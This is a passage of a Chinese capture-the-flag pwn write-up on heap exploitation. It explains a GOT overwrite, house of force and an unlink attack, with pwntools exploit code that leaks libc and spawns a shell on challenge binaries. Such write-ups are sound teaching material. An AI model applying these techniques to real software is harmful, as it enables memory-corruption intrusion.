data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/@DSWG2N9OMPCUJ_5VZNQ.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-241\"\/><\/div><\/figure>\n\n\n\n<p id=\"uf3cdd3d6\">\u91ca\u653e\u6389\u4e86chunk2\u7ed3\u6784\u4f53\u8ddfchunk2\u7684content\uff0c\u4f46\u662f\u7f6e\u7a7a\u53ea\u7f6e\u7a7a\u4e86chunk2\u7ed3\u6784\u4f53\u3002\u7136\u540e\u7533\u8bf7\u4e00\u4e2achunk3, \u5927\u5c0f\u662f0x30,\u624b\u8f93payload\u6709\u70b9\u95ee\u9898\uff0c\u4e8e\u662f\u6211\u5728\u811a\u672c\u8f93payload\u540e attach\uff0c\u5c31\u4f1a\u81ea\u52a8\u5f39\u51fa\u6765pwngdb\uff0c\u7136\u540e\u518d\u770b\u5806\u5185\u5b58\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6KVTA_Y_LBX1UE.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"63\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6KVTA_Y_LBX1UE.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-242\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EC9SVNF5Y9UXG1XC.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"546\" height=\"318\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EC9SVNF5Y9UXG1XC.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-243\"  sizes=\"auto, (max-width: 546px) 100vw, 546px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua781bddd\">\u53ef\u4ee5\u770b\u5230\uff0c0x602018\u5c31\u662ffree_got\u7684\u5730\u5740\uff08\u8fd8\u4e0d\u662ffree\u7684\u5730\u5740\uff0c\u90a3\u91cc\u5b58\u7684\u503c\u624d\u662ffree\u7684\u5730\u5740\uff09,\u7ee7\u7eed\u8ddf\u8fdb\uff0c\u53ef\u4ee5\u53ef\u4ee5\u770b\u5230free\u7684\u771f\u5b9e\u5730\u5740:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OTJNYFW5GDH9@NPDWN8X.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"729\" height=\"411\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/OTJNYFW5GDH9@NPDWN8X.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-244\"  sizes=\"auto, (max-width: 729px) 100vw, 729px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3aac6c2e\">\u63a5\u6536\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H_X9XR0V3VT06N5WCB1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"450\" height=\"60\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/H_X9XR0V3VT06N5WCB1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-245\" style=\"width:743px;height:auto\"  sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue32d33bf\">\u6b64\u65f6\u62ff\u5230\u4e86free\u5730\u5740\uff0c\u5c31\u53ef\u4ee5\u7528\u57fa\u5740\u8ba1\u7b97\u51fasystem\u7684\u5730\u5740\uff0c\u6211\u4e00\u5f00\u59cb\u7528libcsearch\u641e\u4e0d\u5b9a\uff0c\u90a3\u5c31\u53ea\u80fd\u7528\u672c\u5730\u7684\u5e93\u3002<\/p>\n\n\n\n<p id=\"u3f311bfd\">\u672c\u5730\u7684\u5e93\u6709\u65f6\u5019\u4e5f\u4f1a\u62a5\u9519\uff0c\u591a\u8bd5\u51e0\u6b21\u5c31\u4f1a\u6709\u4e00\u6b21\u6210\u529f\uff0c\u539f\u56e0\u672a\u77e5\u3002<\/p>\n\n\n\n<p id=\"u7136d114\">\u6211\u4eec\u73b0\u5728\u5df2\u7ecf\u5f97\u5230\u4e86system\u7684\u5730\u5740\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u8986\u5199\u67d0\u4e2a\u4f1a\u8c03\u7528\u7684\u51fd\u6570\u5730\u5740\u6210system\u5730\u5740\uff1a<\/p>\n\n\n\n<p id=\"u014e9155\">chunk3\u7684content\u6307\u9488\u6b64\u65f6\u662ffree_got\u5730\u5740\uff0c\u8c03\u7528edit_note\u5c31\u80fd\u5bf9free_got\u7684\u5185\u5bb9\u8fdb\u884c\u4fee\u6539\uff0c\u6539\u6210system\u771f\u5b9e\u5730\u5740\u5c31\u884c<\/p>\n\n\n\n<p id=\"uc030659a\">payload3=p64(system)<\/p>\n\n\n\n<p id=\"ube1f4fa3\">\u7136\u540e\u518d\u5f80chunk1\uff0c\u4e5f\u5c31\u662findex\u4e3a0\u7684note\u91cc\u9762\u5199\u5165\/bin\/sh\\x00,\u63a5\u7740delete\u5b83\uff0c\u5c31\u4f1a\u8c03\u7528free\u51fd\u6570\uff0c\u6b64\u65f6\u5b83\u5df2\u7ecf\u662fsystem\u51fd\u6570\u4e86\uff0c\u5c31\u4f1a\u6267\u884csystem(bin\/sh),\u62ff\u5230shell<\/p>\n\n\n\n<p id=\"uad0576e2\">\u8fd9\u91cc\u9996\u5148\u5207\u8bb0recvuntil\u4e00\u5b9a\u8981\u8d8a\u7ec6\u81f4\u8d8a\u597d\uff0c\u5c24\u5176\u662f\u591a\u4e2a\u5192\u53f7\u8fd9\u79cd\uff0c\u4e0d\u7136\u5bb9\u6613\u5bfc\u81f4\u6df7\u4e71\u3002<\/p>\n\n\n\n<p id=\"u31209628\">\u6bd4\u8f83\u5e7d\u9ed8\u7684\u662f\uff0c\u672c\u5730\u6253\u53ea\u80fd\u7528\u672c\u5730\u5e93\u624d\u80fd\u6253\u901a\uff0c\u6253\u8fdc\u7a0b\u53ea\u80fd\u7528libsearcher\u624d\u80fd\u6253\u901a\uff08\u90094\uff09\uff0c\u731c\u6d4b\u662f\u7248\u672c\u95ee\u9898.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5A0RN447AJJVHIYJF-1024x504.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"504\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/5A0RN447AJJVHIYJF-1024x504.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-246\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_143_house_of_force\"><\/span>pwn 143 (house of force)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"514\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/T5I2E_CE4RR9QLY-1024x514.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-249\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u68e98816\">\u6bcf\u5f53\u6709\u4e00\u6b21malloc\u65f6\uff0c\u5982\u679cbins\u91cc\u9762\u6ca1\u6709\u5408\u9002\u7684chunk\u5206\u914d\uff0c\u5c31\u4f1a\u4ecetop chunk\u4e2d\u5272\u4e00\u5757\u51fa\u6765\uff0ctop chunk\u7684\u5730\u5740\u4e5f\u4f1a\u76f8\u5e94\u79fb\u52a8\uff0c\u90a3\u5982\u679cmalloc\u4e86\u4e00\u4e2a\u8d1f\u503c\u5462\uff1ftop chunk\u5c31\u4f1a\u5f80\u4f4e\u5730\u5740\u79fb\u52a8\uff0c\u5982\u679c\u8fd9\u4e2a\u8d1f\u503c\u662f\u53ef\u4ee5\u968f\u610f\u5206\u914d\u7684\uff0c\u4e5f\u5c31\u610f\u5473\u7740top chunk\u7684\u5730\u5740\u80fd\u6539\u5230\u4efb\u610f\u5730\u65b9\uff0c\u8fd9\u65f6\u5019\u518d\u7533\u8bf7chunk\uff0c\u5c31\u80fd\u8fbe\u5230\u4efb\u610f\u5730\u5740\u5199\u7684\u6548\u679c<\/p>\n\n\n\n<p id=\"u2f9c2674\">edit\u80fd\u6ea2\u51fa<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BKS4Z9W_6@E8@SY19@3T-1024x688.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-250\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uabe3c7b3\">delete\u65e0uaf\u6f0f\u6d1e<\/p>\n\n\n\n<p id=\"u6e8a2d8b\">\u6709\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n<p id=\"u713d7a46\">\u601d\u8def\u5c31\u662f\uff0c\u5148\u7533\u8bf7\u4e00\u4e2a0x30\u7684chunk\uff0c\u7136\u540eedit\u5b83\uff0c\u6ea2\u51fa\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1\uff0c\uff08\u8fd9\u6837\u5c31\u80fd\u9003\u8fc7\u68c0\u67e5\u7533\u8bf7\u4e00\u4e2a\u8d1f\u503c\u7684chunk\uff09\uff0c\u63a5\u7740\u7533\u8bf7\u4e00\u4e2a\u7279\u5b9a\u8d1f\u503c\u7684chunk\uff0c\u4f7f\u5f97top chunk\u7684\u5730\u5740\u79fb\u52a8\u5230bye_message\u8fd9\u4e2achunk\u5904\uff0c\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u4fee\u6539message chunk\u7684\u6307\u9488\u6307\u5411\u540e\u95e8\u51fd\u6570\uff0c\u7136\u540e5 exit\u5c31\u80fd\u8c03\u7528\u540e\u95e8\u51fd\u6570:<\/p>\n\n\n\n<p id=\"u5400aa4f\">#\u7533\u8bf7\u7b2c\u4e00\u4e2achunk\uff0c\u8fd9\u4e2achunk\u548ctop\uff1a<\/p>\n\n\n\n<p id=\"u91dde905\">add(0x30, b&#8217;aaaa&#8217;)<\/p>\n\n\n\n<p id=\"u5675e2d5\">#\u4fee\u6539top chunk\u7684size\u4f4d\u4e3a-1<\/p>\n\n\n\n<p id=\"ud2edfe96\">payload = 0x30 * b&#8217;a&#8217;<\/p>\n\n\n\n<p id=\"ufcf40141\">payload += b&#8217;a&#8217; * 8 + p64(0xffffffffffffffff)<\/p>\n\n\n\n<p id=\"uf2d959cb\">edit(0, 0x41, payload)<\/p>\n\n\n\n<p id=\"uc9fffda2\">#\u8ba1\u7b97top chunk\u5e94\u8be5\u79fb\u52a8\u7684\u5927\u5c0f\uff0c\u8fd9\u91cc\u4e0d\u662f\u5f88\u7406\u89e3\uff0c\u6309\u7406\u6765\u8bf4-0x60\u5c31\u591f\u4e86\uff0c\u4f46\u540e\u9762\u8fd8\u8981\u51cf\u53bb\u4e00\u4e2a\u503c\uff0c\u8fd9\u4e2a\u503c\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u57280x8-0x17\u4e4b\u95f4\u90fd\u53ef\u4ee5<\/p>\n\n\n\n<p id=\"ubc744a37\">offset = -0x60-0x17<\/p>\n\n\n\n<p id=\"u5ab04cba\">add(offset, b&#8217;aaaa&#8217;)<\/p>\n\n\n\n<p id=\"u2a3dded7\">#\u518d\u7533\u8bf7\u4e00\u4e2achunk\uff0c\u62ff\u5230message chunk\u7684\u5185\u5b58\uff0c\u4fee\u6539\u6307\u9488\u5373\u53ef<\/p>\n\n\n\n<p id=\"u691b186b\">add(0x10, p64(flag) * 2)<\/p>\n\n\n\n<p id=\"u091fd4e6\">get_flag()<\/p>\n\n\n\n<p id=\"uf18bbdce\">io.interactive()<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_143%E5%8F%A6%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95%E9%87%8D%E8%A6%81unlink\"><\/span>pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"ud7040b44\">unlink\u4ecb\u7ecd\uff1a<\/p>\n\n\n\n<p id=\"ua1cb313c\">\u5728free\u67d0\u4e2a\u5927\u5c0f\u4e0d\u5c5e\u4e8efast bin\u7684\u5728\u4f7f\u7528\u7684\u5806\u5757P\u65f6\uff0c\u4f1a\u89e6\u53d1\u5408\u5e76\u64cd\u4f5c\uff0c\u68c0\u67e5\u524d\u540e\u4e24\u4e2a\u7269\u7406\u76f8\u90bb\u5806\u5757P1\u3001P2\u662f\u4e0d\u662f\u7a7a\u95f2\uff0c\u5982\u679c\u662f\u7a7a\u95f2\uff0c\u5c31\u628aP1\/P1\u4ece\u539f\u672c\u6240\u5728\u7684bin\u4e2dunlink\u51fa\u6765\uff0c\u7136\u540e\u8ddfP\u5408\u5e76\uff0c\u5408\u5e76\u540e\u653e\u5165unsorted bin\u4e2d\u3002<\/p>\n\n\n\n<p id=\"u140b1ee8\">unlink\u64cd\u4f5c\u7684\u5173\u952e\u4e00\u6b65\u662f\uff0cFD=P-&gt;fd,BK=P-&gt;bk,FD-&gt;bk=BK,BK-&gt;fd=FD<\/p>\n\n\n\n<p id=\"u68692f2f\">\u5982\u679c\u628a\u5c06\u8981unlink\u7684\u90a3\u4e2a\u5806\u5757\uff08\u5373P\uff09\u7684fd\u548cbk\u6307\u9488\u4fee\u6539\u4e86\uff0c FD\u6307\u5411\u9700\u8981\u6539\u53d8\u503c\u7684\u5730\u5740\uff0cBK\u6307\u5411\u60f3\u8981\u6539\u6210\u7684\u503c\uff0c\u5f53FD-&gt;bk=BK\u540e\uff0c\u5c31\u5b9e\u73b0\u4e86\u503c\u7684\u7be1\u6539\u3002\u4f46\u662f\u6ce8\u610f\uff0cFD-&gt;bk=FD-12(32\u4f4d\uff0csize+prevsize+fd\u5404\u56db\u4f4d)\uff0c\u6240\u4ee5\u7be1\u6539\u7684\u5730\u5740\u5e94\u8be5\u8981-12\uff0c\u8fd9\u6837\u624d\u80fd\u5b9e\u73b0\u6b63\u786e\u7684\u6307\u5411\u3002<\/p>\n\n\n\n<p id=\"u1adcb4bd\">\u4f46\u662f\u8fd9\u6837\u53ea\u6709\u5728\u4f4e\u7248\u672c\u4e2d\u884c\u5f97\u901a\uff0c\u9ad8\u7248\u672c\u4e2d\u65b0\u589e\u4e86\u68c0\u67e5\uff0c\u5728unlink\u524d\uff0c\u5148\u786e\u5b9aFD-&gt;bk=P\uff0cBK-&gt;fd=P\uff0c\u4ee5\u9632\u6b62\u4f2a\u9020chunk\u3002\u8fd9\u6837\u7684\u8bdd\u4e0a\u9762\u7684\u529e\u6cd5\u660e\u663e\u5c31\u901a\u4e0d\u8fc7\u68c0\u67e5\u4e86\u3002\u4e8e\u662f\u6709\u4e86\u53e6\u4e00\u79cd\u601d\u8def\uff1a\uff0832\u4f4d\uff09<\/p>\n\n\n\n<p id=\"u49de5fc9\">\u65e2\u7136\u8981\u4fdd\u8bc1FD-&gt;bk=P\uff0cBK-&gt;fd=P\uff0c\u90a3\u5c31\u76f4\u63a5\u8ba9FD=P-12,BK=P-8\u5c31\u884c\u4e86\uff0c\u8fd9\u6837<\/p>\n\n\n\n<p id=\"u9e84d62a\">FD-&gt;bk=FD+12=P<\/p>\n\n\n\n<p id=\"u261b4774\">BK-&gt;fd=BK+8=P<\/p>\n\n\n\n<p id=\"u4ab72c04\">\u5c31\u7ed5\u8fc7\u4e86\u68c0\u6d4b\uff0c\u6267\u884c\u5b8cunlink\u540e\uff0cFD-&gt;bk=BK,BK-&gt;fd=FD,\u6700\u540e\u5c31\u662fP=P-12\uff0cP\u6307\u9488\u6307\u5411\u4e86\u6bd4\u81ea\u5df1\u4f4e12\u5904.<\/p>\n\n\n\n<p id=\"u835617b2\">\u7ea2\u5b57\u6709\u8bef\uff0c\u6b63\u786e\u7684\u8868\u8fbe\u5e94\u8be5\u662f\uff0cP\u6307\u9488\u5904\u7684\u503c\u53d8\u6210P\u6307\u9488-12<\/p>\n\n\n\n<p id=\"u51ca3d73\">\u6307\u9488\u53ef\u4ee5\u7406\u89e3\u6210\u4e00\u4e2a\u5730\u5740\uff0c\u6bd4\u5982P\u6307\u9488=0x400400,0x400400\u5904\u5b58\u653e\u7684\u503c\u4e3a0x600600,\u8fd9\u4e2a\u503c\u672c\u6765\u662fchunk0\u6240\u5728\u5730\u5740\u7684\uff0c\u4f46\u662funlink\u653b\u51fb\u540e0x400400\u5904\u7684\u503c\u53d8\u6210\u4e860x400400-12\uff0c\u53ef\u4ee5\u7406\u89e3\u6210 \u628a chunk \u79fb\u5230\u5b58\u50a8 chunk \u6307\u9488\u7684\u5185\u5b58-12\u5904\u3002\u8fd9\u6837\u4e0b\u4e00\u6b21edit\u8fd9\u4e2achunk\u7684\u65f6\u5019\u5c31\u80fd\u7be1\u65390x400400\u5904\u7684\u503c\u4e3a\u81ea\u5df1\u60f3\u8981\u7684\u503c\uff0c\u518dshow\u51fa\u6765\u5c31\u80fd\u6cc4\u9732\u5185\u5b58\u5730\u5740\u3002\u800c\u5982\u679c\u518dedit\u4e00\u6b21\uff0c\u7531\u4e8e\u6b64\u65f60x400400\u5904\u7684\u503c\u5df2\u7ecf\u53d8\u6210\u4e86\u6cc4\u9732\u5185\u5b58\u5730\u5740\u7684\u503c\uff0c\u90a3\u5c31\u76f8\u5f53\u4e8e\u5bf9\u8fd9\u4e2a\u5730\u5740\u76f4\u63a5\u5199\u4e86\u3002<\/p>\n\n\n\n<p id=\"uef9c7432\">add(0x40,&#8217;aaaaaaaa&#8217;)#0<\/p>\n\n\n\n<p id=\"uf6622de7\">add(0x80,&#8217;bbbbbbbb&#8217;)#1<\/p>\n\n\n\n<p id=\"ufcd419ae\">add(0x80,&#8217;cccccccc&#8217;)#2<\/p>\n\n\n\n<p id=\"u4675675f\">add(0x20,&#8217;\/bin\/sh\\x00&#8242;)<\/p>\n\n\n\n<p id=\"uf3a88c57\">ptr=0x6020a8<\/p>\n\n\n\n<p id=\"u81f4a720\">fd=ptr-0x18<\/p>\n\n\n\n<p id=\"u0b8a4f34\">bk=ptr-0x10<\/p>\n\n\n\n<p id=\"ud311c1c4\">#fakechunk<\/p>\n\n\n\n<p id=\"u6f518e28\">fakechunk=p64(0)#prevsize<\/p>\n\n\n\n<p id=\"ud28d567e\">fakechunk+=p64(0x41) #size<\/p>\n\n\n\n<p id=\"u145a6837\">fakechunk+=p64(fd)<\/p>\n\n\n\n<p id=\"u0bf18c30\">fakechunk+=p64(bk)<\/p>\n\n\n\n<p id=\"u5ca83860\">fakechunk+=b&#8217;\\x00&#8217;*0x20<\/p>\n\n\n\n<p id=\"u40719ebe\">fakechunk+=p64(0x40)#chunk1&#8217;s prevsize,0x40 means chunk0 is 0x40 and in free<\/p>\n\n\n\n<p id=\"uf15cf518\">fakechunk+=p64(0x90)#chunk1&#8217;s size<\/p>\n\n\n\n<p id=\"u0ca6830b\">edit(0,len(fakechunk),fakechunk)<\/p>\n\n\n\n<p id=\"u9c1ea352\">#gdb.attach(io)<\/p>\n\n\n\n<p id=\"u898dffb8\">delete(1) #then chunk0 will unlink<\/p>\n\n\n\n<p id=\"u744a2369\">payload=p64(0)*2+p64(0x40)+p64(elf.got[&#8220;free&#8221;])<\/p>\n\n\n\n<p id=\"u18661311\">edit(0,len(fakechunk),payload)<\/p>\n\n\n\n<p id=\"u1e967a18\">#gdb.attach(io)<\/p>\n\n\n\n<p id=\"u916c8e0b\">show()<\/p>\n\n\n\n<p id=\"ue3efd8c8\">free = u64(io.recvuntil(b&#8221;\\x7f&#8221;)[-6: ].ljust(8, b&#8217;\\x00&#8242;))<\/p>\n\n\n\n<p id=\"ua91eebb7\">log.info(&#8220;free addr is:%x&#8221;,free)<\/p>\n\n\n\n<p id=\"u524e7947\">libc = LibcSearcher(&#8216;free&#8217;,free)<\/p>\n\n\n\n<p id=\"u98196234\">libc_base = free &#8211; libc.dump(&#8216;free&#8217;)<\/p>\n\n\n\n<p id=\"u1030f7a3\">system = libc_base + libc.dump(&#8216;system&#8217;)<\/p>\n\n\n\n<p id=\"u4ad4909b\">edit(0,0&#215;8,p64(system))<\/p>\n\n\n\n<p id=\"u9884a675\">delete(3)<\/p>\n\n\n\n<p id=\"uac5f4870\">io.interactive()<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_144\"><\/span>pwn 144<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/FUBE6SNHJ9DF56T@9RCUC-1024x561.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/FUBE6SNHJ9DF56T@9RCUC-1024x561.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-251\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ufe98bd88\">\u8fd9\u9898\u8981\u4fee\u6539\u67d0\u4e2a\u4f4d\u7f6e\u5df2\u77e5\u7684\u5168\u5c40\u53d8\u91cf\u7684\u503c\u624d\u80fd\u62ff\u5230flag\u3002\u6f0f\u6d1e\u53ea\u6709edit\u7684\u4efb\u610f\u6ea2\u51fa\u3002<\/p>\n\n\n\n<p id=\"u26a8e480\">\u9996\u5148\u60f3\u5230\u7684\u5f53\u7136\u662f\u4fee\u6539\u67d0\u4e2afree\u6389\u7684\u5757\u7684fd\u6216\u8005bk\u6307\u9488\u6307\u5411\u76ee\u6807\u5730\u5740\uff0c\u7136\u540emalloc\u4e00\u6216\u4e24\u6b21\u5c31\u80fd\u62ff\u5230\u76ee\u6807\u5730\u5740\u7684chunk\uff0c\u8fdb\u800c\u6539\u5199\u3002\u4f46\u662f\u4e4b\u524d\u90fd\u662fUAF\u6765\u505a\uff0c\u8fd9\u91cc\u62d3\u5bbd\u4e86\u601d\u8def\uff0c\u6ea2\u51fa\u4e5f\u80fd\u505a\u3002<\/p>\n\n\n\n<p 